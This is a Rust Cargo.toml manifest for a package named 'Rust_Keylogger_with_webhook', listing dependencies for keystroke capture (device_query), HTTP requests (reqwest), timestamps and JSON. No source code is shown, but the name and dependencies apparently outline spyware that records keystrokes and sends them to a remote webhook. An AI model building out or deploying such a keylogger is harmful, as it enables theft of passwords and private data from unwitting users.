[package]
name = "Rust_Keylogger_with_webhook"
version = "0.1.0"
edition = "2024"

[dependencies]
reqwest = { version = "0.12.23", features = ["blocking", "json"] }
device_query = "4.0.1"
chrono = "0.4"
serde_json = "1.0.145"
